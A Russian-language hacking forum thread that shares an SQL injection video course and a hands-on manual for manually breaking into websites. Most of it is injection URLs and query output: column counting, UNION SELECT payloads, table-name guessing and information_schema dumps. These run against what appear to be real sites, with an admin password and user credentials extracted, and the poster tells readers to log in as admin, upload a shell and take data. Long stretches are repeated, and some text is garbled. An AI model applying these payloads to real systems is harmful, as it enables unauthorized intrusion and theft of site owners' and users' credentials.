< SQL > Смотреть онлайн Все секреты SQL Видеокурс (2014) Год выхода: 2014 Язык: русский Автор (режиссер): Le

Тема в разделе "SQL", создана пользователем Kluch, 10 апр 2016.

  1. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    Все секреты SQL Видеокурс (2014) Год выхода: 2014 Язык: русский Автор (режиссер): LendWings
    Буду выкладывать курс.Курс состоит из 42 видео уроков. Facebok дал ему премию в размере 1000 $ за то что он показал,как можно выебать эту соц сеть))Они случайно не разорились?
    Cписок уроков:
    01. Введение в курс
    02. Знакомство с инструктором
    03. Юридические аспекты
    04. Внедрение SQL-кода
    05. Проблемы безопасности
    06. Установка среды в ОС Windows
    07. Установка среды в ОС Linux
    08. Стандартное внедрение, основанное на ошибках
    09. Узнаем об ошибках больше
    10. Дамп базы данных — задание 1
    11. Дамп через SQL
    12. Внедрение без кавычек — задание 2
    13. Внедрение с операторами OR и AND
    14. Внедрение SQL-кода — задание 3
    15. Внедрение SQL-кода — задание 4
    16. 26 важных команд для сложного внедрения SQL-кода
    17. Внедрение двойным запросом — задание 5
    18. Упражнение по двойному запросу
    19. Команды SQL для продвинутого внедрения -задание 6
    20. Слепое внедрение типа данных Boolean
    21. Команды для внедрения, основанного на времени — задание 7
    22. Внедрение, основанное на времени — задание 8
    23. Внедрение кода, дамп данных
    24. Дамп данных — задание 9
    25. Внедрение через метод POST — задание 10
    26. Внедрение через метод POST — задание 11
    27. Внедрение через метод POST, команды для двойных запросов
    28. Двойные вопросы — задание 12
    29. Внедрение через метод POST, основанное на времени — задание 13
    30. Без подсказок — задание 14
    31. Stripslashes и атака через запрос UPDATE — задание 15
    32. Внедрение через заголовок с использованием Tamper Data — задание 16
    33. Внедрение через Cookie — задание 17
    34. Зашифрованное внедрение через Cookie — задание 18
    35. Задание 19
    36. Внедрение второго порядка с использованием фильтров — задание 20
    37. Занесенные в blacklist операторы OR и AND — задание 21
    38. Занесенные в blacklist пробелы и комментарии — задание 22
    39. Анализ важных скрипов для внедрения
    40. Практическое задание 23
    41. Занесенные в blacklist операторы UNION и SELECT — задание 24
    42. Заключение
     
    #1 Kluch, 10 апр 2016
    Последнее редактирование: 11 апр 2016
  2. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    Благородя [Ссылки могут видеть только зарегистрированные пользователи.] курс можно скачать без геморроя за 30-40 минут.У кого есть время и возможность разместить его на ютуб или еще где-то ,чтобы его можно было просматривать тут,то будут лайки в репу) тут ссылка на скачивание [Ссылки могут видеть только зарегистрированные пользователи.]
     
  3. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской

     
    #3 Kluch, 1 май 2016
    Последнее редактирование: 3 май 2016
  4. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    Суть курса заключается в ручном взломе сайтов путем правильных запросов к бд сайта. Правильными запросами можно вывести все таблицы,колонки сайта. Как морской бой,но после просмотра курса более и менее понятно. бывает так что программа Havij выдает в названиях базы крокозябры,большинство атак как правило на этом и заканчиваются,так как в крокозябрах не поймешь название таблиц и что искать. А вот ручные запросы выводят в самом браузере правильную информацию. Вот мануал в принципе показывает поясняет что к чему.
    Наверняка все те,кто юзает Havij знают как ищутся дырявые php-скрипты, поэтому особого усилия на объяснения не буду прикладывать,
    всё упирается в то,чтоб найти дырявый скрипт,в котором не фильтруються переменные.


    Ну вот, нашли мы такую ссылку:

    Код:
    http://ikcnru.149.com1.ru/new.php?id=3
    
    Как нам узнать дырявый скрипт или нет? Всё просто, ставим "'" (одинарная кАвычка)
    Код:
    Код:
    http://ikcnru.149.com1.ru/new.php?id=3'
    
    Если страница загрузилась без изменений, то значит хорошие были программисты, а если вылетило что-то вроде этого, в нашем случае:
    Код:
    Код:
    Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/ikcnru85/public_html/new.php on line 38
    Ура! Это и есть SQL уязвимость.
    Cейчас будем пытаться вытащить с помощью этой уязвимости из базы данных логин и пасс админа.

    Итак,сначало нам надо выяснить сколько полей в базе данных. Для этого используем оператор "order+by".
    И так проверим сколько-же там полей используя order+by:

    Код:
    http://ikcnru.149.com1.ru/new.php?id=3+order+by+100 /*
     
    #4 Kluch, 4 май 2016
    Последнее редактирование: 4 май 2016
  5. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской

    *каждый запрос закрывается "/*" ,если после такого закрытия вылазит ошибка – ставим "--". или --+ и еще
    +order+by+ пишем в запросе без +
    Код:
    Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/ikcnru85/public_html/new.php on line 38
    Данное сообщение говорит нам о том,что полей меньше 100.
    Код:
    http://ikcnru.149.com1.ru/new.php?id=3+order+by+10/*
    Код:
    Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/ikcnru85/public_html/new.php on line 38
    Опять ошибка, которая нам говорит,что полей меньше 10.
    После недолгих вычислений становится ясно, что полей - 5 –страница загрузилась без ошибки.

    Код:
    http://ikcnru.149.com1.ru/new.php?id=3+order+by+5/*

    Теперь зная, что полей 5,посмотрим какое из них принтабельное, то
    есть с помощью какого поля выводиться информация. Для этого нам нужно воспользоваться оператором
    "union+select",составляем запрос, делаеться это так:

    Код:
    http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,4,5/*
    Когда страница загрузилась, мы видим, что появилась цифра 4, это значит,через это поле мы и будем доставать логин и пасс админа.

    Первым делом узнаём версию Бд – вставляем вместо 4ки "version()":

    Код:
    http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,version (),5/*
     
  6. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    Что же мы видим? -- 4.1.25-log

    Фигово канешн, что это бд не 5.x.xx, в которой есть т.н INFORMATION_SCHEMA, содержащая имена всех таблиц в Бд.
    Если это Бд 4.х.хх, то придётся пользоваться головой.
    Придётся перебирать имена таблиц ручками:
    Код:
    http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,4,5+from+ [имя таблицы,которое приходит на ум]/*
    Примерный список таблиц для бд меньше 5х версий:
    mysql.user 4images_users account accounts admin admin1 administer administrable administrate administrator administrators administratrix admins client clients contact contacts content cpg_bridge cpg_config dbadmins dealer dealers fusion_new_users fusion_user_groups fusion_users group groups ibf_admin_sessions ibf_conf_settings ibf_member_extra ibf_members ibf_members_converge icq jos_blastchatc_users jos_comprofiler_members jos_joomblog_users jos_messages_cfg jos_moschat_users jos_users 0:kpro_adminlogs 0:kpro_user 1:login 1:logins mb_users member members minibbtable_users mybb_forums mybb_users news nuke_authors nuke_bbconfig nuke_config nuke_popsettings nuke_users obb_profiles partner partners passes password passwords phorum_users phpads_affiliates phpads_clients phpads_config phpbb_users products punbb_users pwd pwds reguser regusers sites smf_members sn_admins system usebb_members usebb_name user user_list user_logins useralbums userlist userlogins usernames users xar_roles xoops_bannerclient xoops_users yabbse_1.5.5
     
  7. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    Если после запроса
    Код:
    http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,4,5+from+ [имя таблицы,которое приходит на ум]/*
    страница загрузилась без ошибок, значит,такая таблица имеется.

    Не буду вас парить, интересующая нас таблица в данном примере зовётся admin).
    Код:
    http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,4,5+from+admin--
    Теперь проверим, существует ли запись с названием name в таблицы
    admin.Это делаесть почти также, только в 4-ое поле вставляем слово name,этим мы и будем проверять
    существует ли запись name в таблице admin.Этот запрос будет выглядеть так:

    Код:
    http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,name,5+from+admin--
    Ошибка - значит такого поля нету. Двигаем дальше:
    Код:
    http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,username,5+from+admin--
    Опять:
    Код:
    Код:
    http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,login,5+from+admin--
    Есть такое поле.После предыдущего запроса на страничку видим что?: "admin"

    Далее, пробуем найти пасс.
    Также вместо 4ки пробуем вставлять интересующие нас имена полей –pass,password

    Код:
    Код:
    http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,password,5+from+admin--
     
  8. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    Ошибка, значит такого нема.
    Код:
    Код:
    http://ikcnru.149.com1.ru/new.php?id=3+union+select+1,2,3,pass,5+from+admin--
    Cтраница загрузилась, и что видим: "4nosferatu"

    Далее,делайте что хотите. Ищите админку,
    заходите под админом,заливайте шелл,сливайте что хотите,заливайте всё что хотите( куда позволено)
     
  9. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    А кто данный курс видел?
     
  10. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    закину сюда,чтобы не искать на компе)
    [Ссылки могут видеть только зарегистрированные пользователи.]' --+ (успех)

    Hint : Error based string
    Your Login name:some
    Your Password:some

    [Ссылки могут видеть только зарегистрированные пользователи.] (неудача)
    Hint : Error based string
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1


    [Ссылки могут видеть только зарегистрированные пользователи.] (неудача)

    Hint : Error based string
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1\' LIMIT 0,1' at line 1

    [Ссылки могут видеть только зарегистрированные пользователи.] -- (удача)
    Hint : Error based string
    Your Login name:some
    Your Password:some

    [Ссылки могут видеть только зарегистрированные пользователи.]

    Hint : Error based string
    Your Login name:salman
    Your Password:khan

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Hint : Error based string
    Your Login name:rajesh
    Your Password:kumar

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Hint : Error based string
    Your Login name:guru
    Your Password:guru2

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Hint : Error based string
    Your Login name:thing
    Your Password:noun

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Hint : Error based string
    Your Login name:thor
    Your Password:brave

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Hint : Error based string
    Your Login name:avenger
    Your Password:heros

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Hint : Error based string
    Your Login name:admin
    Your Password:admin
    funny

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Hint : Error based string
    Your Login name:admin1
    Your Password:admin1

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Lesson-1
    Hint : Error based string
    Your Login name:admin2
    Your Password:admin2

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Lesson-1
    Hint : Error based string
    Your Login name:admin4
    Your Password:admin4

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Lesson-1
    Hint : Error based string (неудача)
    funny
    я вы¤снил что в базе 14 колонок
    используем цыфры которые не вызывают ошибку
    [Ссылки могут видеть только зарегистрированные пользователи.] all select 1,2,3 --+
    Hint : Error based string
    Your Login name:some
    Your Password:some (успех)
    --------------------------------------------------------------------------------------

    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,database(),8 --+
    Hint : Error based string
    Your Login name:some
    Your Password:some (успех)
    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,database(),3 --+ (нужно использовать значение между аргументами 1 и 3)
    ---------------------------------
    Hint : Error based string
    Your Login name:security
    Your Password:8
    ---------------------------------------------------------------------------------------



    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,database(),version() --+
    успех

    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,@@version,3 --+
    успех

    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,database(),version() --+
    Hint : Error based string
    Your Login name:security
    Your Password:5.7.9

    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,@@version,3 --+
    Hint : Error based string
    Your Login name:5.7.9
    Your Password:3
    ----------------------------------------
    создание дампа базы данных
    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,table_name,3 from information_schema.tables --+
    ѕодсказка : строки ошибка
    ¬аш логин:CHARACTER_SETS
    ¬аш ѕароль:3
    --------
    еще вариант этого запроса
    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,сolumn_name,3 from information_schema.c where table_schema='security' --+
    ѕодсказка : строки ошибка
    ¬аш логин:письма
    ¬аш ѕароль:3
    -----
    если неуверены в названии базы данных то используем следующий код который вернет название базы данных
    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,table_name,3 from information_schema.tables where table_schema=database() --+

    Hint : Error based string
    Your Login name:emails
    Your Password:3

    ____________
    ак получить название всех таблиц --limit
    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,table_name,3 from information_schema.tables where table_schema=database()limit 0,4 --+
    Hint : Error based string
    Your Login name:referers
    Your Password:3
    ----
    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,table_name,3 from information_schema.tables where table_schema=database()limit 3,1 --+
    Hint : Error based string
    Your Login name:users
    Your Password:
    ------------------
    Ётим запросом ждем вывода названи¤ всех таблиц
    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
    Hint : Error based string
    Your Login name:emails,referers,uagents,users
    Your Password:3
    -----------------
    теперь пробираемс¤ к юзерс
    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,group_concat(сolumn_name),3 from information_schema.columns where table_name='users'--+
    ------
    пароли вы¤сн¤ем
    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,group_concat(username),group_concat(password) from users --+

    ура---------Hint : Error based string
    Your Login name:some,salman,rajesh,guru,thing,thor,avenger,admin,admin1,admin2,admin3,holy,admin4
    Your Password:some,khan,kumar,guru2,noun,brave,heros,admin,admin1,admin2,admin3,cow,admin4

    11 урок----linux/расследовании компьютерных преступлени

    ------------------------------------------------
    операторы or и #
    #- код %23
    [Ссылки могут видеть только зарегистрированные пользователи.] было написано 1' or '1
    Hint : Error based string
    Your Login name:some
    Your Password:some

    [Ссылки могут видеть только зарегистрированные пользователи.]' or 1='1 (удача)
    [Ссылки могут видеть только зарегистрированные пользователи.] all select 1,2,3 or'1
    Урок-1

    Подсказка : строки ошибка
    Ваш логин:некоторые
    Пароль:одни

    смешно

    [Ссылки могут видеть только зарегистрированные пользователи.]') union all select 1,2,3 --+ (удача) 14 урок.
    -----------------
    [Ссылки могут видеть только зарегистрированные пользователи.]") union all select 1,2,3 --+ (удача) 15 урок
    Hint : Error based Double quotes string

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Your Login name:some
    Your Password:some
    ------------
    [Ссылки могут видеть только зарегистрированные пользователи.]") union all select 1,2,3 --+

    Hint : Error based Double quotes string

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Your Login name:2
    Your Password:3

    funny
    --------------------------------------------------------------------------------------------------
    show databases;
    show tables;
    desc users;
    use informatinon_shema;
    select table_name from information_schema.tables where table_schema='security';
    select column_name from information_schema.columns where table_name='users';
    (11 урок)
    --------------
    [Ссылки могут видеть только зарегистрированные пользователи.]

    %20information_schema.tables%20where%20table_schema=database%28%29%20limit%200,1%20--+

    -------------
    localhost/master/Less-1/index.php?id=-1'union all select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1 --+
    При замене 0,1 на 1,2 на 2,3 на 3,4
    браузер выводит название таблиц в базе данных
    Hint : Error based string
    Your Login name:emails
    Your Password:3
    ------------------------
    [Ссылки могут видеть только зарегистрированные пользователи.]

    %20where%20table_schema=%20%27security%27%20%20--+
    Hint : Error based string
    Your Login name:emails
    Your Password:3
    ---------------------
    [Ссылки могут видеть только зарегистрированные пользователи.]

    %20where%20table_schema=%20%27mysql%27%20%20--+
    Hint : Error based string
    Your Login name:columns_priv
    Your Password:3
    -----------------------
    по колонкам
    [Ссылки могут видеть только зарегистрированные пользователи.]

    %20information_schema.columns%20where%20table_name=%27users%27%20--+
    Hint : Error based string
    Your Login name:USER
    Your Password:3
    ------------------------------------------------\
    узнать имена пользователей
    use security;
    select * from users;

    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,group_concat (username),group_concat( password) from users --+
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4,(email),6,7,(user),9,10,11,12,13,14,15 from users --
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4,database(),6,7,version(),9,10,11,12,13,14,15 -- (
    dietrix_catalogweb)
    --------------------------хуйнуло все таблицы сайта
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables --


    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_schema='users' --(запрос прошел но нихуя не дал)


    ------------------------------ вывело логины пользователей
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4,user,6,7,8,9,10,11,12,13,14,15 from users --
     
  11. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    [Ссылки могут видеть только зарегистрированные пользователи.]' --+ (успех)

    Hint : Error based string
    Your Login name:some
    Your Password:some

    [Ссылки могут видеть только зарегистрированные пользователи.] (неудача)
    Hint : Error based string
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1


    [Ссылки могут видеть только зарегистрированные пользователи.] (неудача)

    Hint : Error based string
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1\' LIMIT 0,1' at line 1

    [Ссылки могут видеть только зарегистрированные пользователи.] -- (удача)
    Hint : Error based string
    Your Login name:some
    Your Password:some

    [Ссылки могут видеть только зарегистрированные пользователи.]

    Hint : Error based string
    Your Login name:salman
    Your Password:khan

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Hint : Error based string
    Your Login name:rajesh
    Your Password:kumar

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Hint : Error based string
    Your Login name:guru
    Your Password:guru2

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Hint : Error based string
    Your Login name:thing
    Your Password:noun

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Hint : Error based string
    Your Login name:thor
    Your Password:brave

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Hint : Error based string
    Your Login name:avenger
    Your Password:heros

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Hint : Error based string
    Your Login name:admin
    Your Password:admin
    funny

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Hint : Error based string
    Your Login name:admin1
    Your Password:admin1

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Lesson-1
    Hint : Error based string
    Your Login name:admin2
    Your Password:admin2

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Lesson-1
    Hint : Error based string
    Your Login name:admin4
    Your Password:admin4

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Lesson-1
    Hint : Error based string (неудача)
    funny
    я вы¤снил что в базе 14 колонок
    используем цыфры которые не вызывают ошибку
    [Ссылки могут видеть только зарегистрированные пользователи.] all select 1,2,3 --+
    Hint : Error based string
    Your Login name:some
    Your Password:some (успех)
    --------------------------------------------------------------------------------------

    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,database(),8 --+
    Hint : Error based string
    Your Login name:some
    Your Password:some (успех)
    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,database(),3 --+ (нужно использовать значение между аргументами 1 и 3)
    ---------------------------------
    Hint : Error based string
    Your Login name:security
    Your Password:8
    ---------------------------------------------------------------------------------------



    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,database(),version() --+
    успех

    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,@@version,3 --+
    успех

    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,database(),version() --+
    Hint : Error based string
    Your Login name:security
    Your Password:5.7.9

    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,@@version,3 --+
    Hint : Error based string
    Your Login name:5.7.9
    Your Password:3
    ----------------------------------------
    создание дампа базы данных
    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,table_name,3 from information_schema.tables --+
    ѕодсказка : строки ошибка
    ¬аш логин:CHARACTER_SETS
    ¬аш ѕароль:3
    --------
    еще вариант этого запроса
    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,сolumn_name,3 from information_schema.c where table_schema='security' --+
    ѕодсказка : строки ошибка
    ¬аш логин:письма
    ¬аш ѕароль:3
    -----
    если неуверены в названии базы данных то используем следующий код который вернет название базы данных
    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,table_name,3 from information_schema.tables where table_schema=database() --+

    Hint : Error based string
    Your Login name:emails
    Your Password:3

    ____________
    ак получить название всех таблиц --limit
    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,table_name,3 from information_schema.tables where table_schema=database()limit 0,4 --+
    Hint : Error based string
    Your Login name:referers
    Your Password:3
    ----
    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,table_name,3 from information_schema.tables where table_schema=database()limit 3,1 --+
    Hint : Error based string
    Your Login name:users
    Your Password:
    ------------------
    Ётим запросом ждем вывода названи¤ всех таблиц
    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
    Hint : Error based string
    Your Login name:emails,referers,uagents,users
    Your Password:3
    -----------------
    теперь пробираемс¤ к юзерс
    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,group_concat(сolumn_name),3 from information_schema.columns where table_name='users'--+
    ------
    пароли вы¤сн¤ем
    [Ссылки могут видеть только зарегистрированные пользователи.]' union all select 1,group_concat(username),group_concat(password) from users --+

    ура---------Hint : Error based string
    Your Login name:some,salman,rajesh,guru,thing,thor,avenger,admin,admin1,admin2,admin3,holy,admin4
    Your Password:some,khan,kumar,guru2,noun,brave,heros,admin,admin1,admin2,admin3,cow,admin4

    11 урок----linux/расследовании компьютерных преступлени

    ------------------------------------------------
    операторы or и #
    #- код %23
    [Ссылки могут видеть только зарегистрированные пользователи.] было написано 1' or '1
    Hint : Error based string
    Your Login name:some
    Your Password:some

    [Ссылки могут видеть только зарегистрированные пользователи.]' or 1='1 (удача)
    [Ссылки могут видеть только зарегистрированные пользователи.] all select 1,2,3 or'1
    Урок-1

    Подсказка : строки ошибка
    Ваш логин:некоторые
    Пароль:одни

    смешно
     
  12. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    [Ссылки могут видеть только зарегистрированные пользователи.]') union all select 1,2,3 --+ (удача) 14 урок.
    -----------------
    [Ссылки могут видеть только зарегистрированные пользователи.]") union all select 1,2,3 --+ (удача) 15 урок
    Hint : Error based Double quotes string

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Your Login name:some
    Your Password:some
    ------------
    [Ссылки могут видеть только зарегистрированные пользователи.]") union all select 1,2,3 --+

    Hint : Error based Double quotes string

    [Ссылки могут видеть только зарегистрированные пользователи.]
    Your Login name:2
    Your Password:3

    funny
    --------------------------------------------------------------------------------------------------
    show databases;
    show tables;
    desc users;
    use informatinon_shema;
    select table_name from information_schema.tables where table_schema='security';
    select column_name from information_schema.columns where table_name='users';
    (11 урок)
    --------------
    [Ссылки могут видеть только зарегистрированные пользователи.]

    %20information_schema.tables%20where%20table_schema=database%28%29%20limit%200,1%20--+

    -------------
    localhost/master/Less-1/index.php?id=-1'union all select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1 --+
    При замене 0,1 на 1,2 на 2,3 на 3,4
    браузер выводит название таблиц в базе данных
    Hint : Error based string
    Your Login name:emails
    Your Password:3
    ------------------------
    [Ссылки могут видеть только зарегистрированные пользователи.]

    %20where%20table_schema=%20%27security%27%20%20--+
    Hint : Error based string
    Your Login name:emails
    Your Password:3
    ---------------------
    [Ссылки могут видеть только зарегистрированные пользователи.]

    %20where%20table_schema=%20%27mysql%27%20%20--+
    Hint : Error based string
    Your Login name:columns_priv
    Your Password:3
    -----------------------
    по колонкам
    [Ссылки могут видеть только зарегистрированные пользователи.]

    %20information_schema.columns%20where%20table_name=%27users%27%20--+
    Hint : Error based string
    Your Login name:USER
    Your Password:3
    ------------------------------------------------\
    узнать имена пользователей
    use security;
    select * from users;
    --------------------------------------------ВЗЛОМ ЧЕРЕЗ БРАУЗЕР============================
    [Ссылки могут видеть только зарегистрированные пользователи.]'
    [Ссылки могут видеть только зарегистрированные пользователи.] order by 15 --
    [Ссылки могут видеть только зарегистрированные пользователи.]
    [Ссылки могут видеть только зарегистрированные пользователи.] 16 ошибка,на 14 все заебись
    [Ссылки могут видеть только зарегистрированные пользователи.] SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- (Not Acceptable!

    An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.)
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4,(email),6,7,(user),9,10,11,12,13,14,15 from users --

    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4,(email),6,7,(password),9,10,11,12,13,14,15 from users --



    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,username,password,1 FROM admin --
    Table 'dietrix_catalogweb.admin' doesn't exist
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- (выдало 2 цыфры 5 и 8)


    ------------------
    ---------------------Список таблиц менше 5 версии
    mysql.user 4images_users account accounts admin admin1 administer administrable administrate administrator administrators administratrix admins client clients contact contacts content cpg_bridge cpg_config dbadmins dealer dealers fusion_new_users fusion_user_groups fusion_users group groups ibf_admin_sessions ibf_conf_settings ibf_member_extra ibf_members ibf_members_converge icq jos_blastchatc_users jos_comprofiler_members jos_joomblog_users jos_messages_cfg jos_moschat_users jos_users 0:kpro_adminlogs 0:kpro_user 1:login 1:logins mb_users member members minibbtable_users mybb_forums mybb_users news nuke_authors nuke_bbconfig nuke_config nuke_popsettings nuke_users obb_profiles partner partners passes password passwords phorum_users phpads_affiliates phpads_clients phpads_config phpbb_users products punbb_users pwd pwds reguser regusers sites smf_members sn_admins system usebb_members usebb_name user user_list user_logins useralbums userlist userlogins usernames users xar_roles xoops_bannerclient xoops_users yabbse_1.5.5
    база данных 5.5.42-37.1
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15 --
    ----------------====================================================
    ==================================
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4, column_name,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name= 'users' --
    выдало кучу разной хуйни.
    =========================
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4, 5,6,7,table_name,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database() limit 1,2 --
    ===================================
    еще ондна хуйня вывела категории
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4, 5,6,7,table_name,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database() limit 3,4 --
    ===================================
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4, 5,6,7,table_name,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database() limit 2,3 --
    нужно выяснить название базы данных
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15 --
    поличили название
    dietrix_catalogweb

    теперь выполняем дамп одной из таблиц и получаем дохуя таблиц
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables --
    Если мы до конца не уверены в коректности данных то мы уже конкретно указываем название бд сайта и видим уже четкий список таблиц.
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema='dietrix_catalogweb' --
    если я неуверен в точном названии базы данных то можно использовать слдеущее выражение
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database() --
    как известно бд состоит из множества таблиц,как получить все,для этого испольхуем оператор limit 1,2
    cat_estatus
    но можно и попробовать limit 3,1-------и видим cat_privilegios
    а на limit 3,4 вышло еще больше таблиц

    cat_privilegios
    categorias
    clientes
    folios
    чтобы получить название всех таблиц бд с которыми работаем пишем group_concat(table_name)не работает
    мы можем получить данные из всех таблиц,но для этого нам нужны колонки из таблицы users
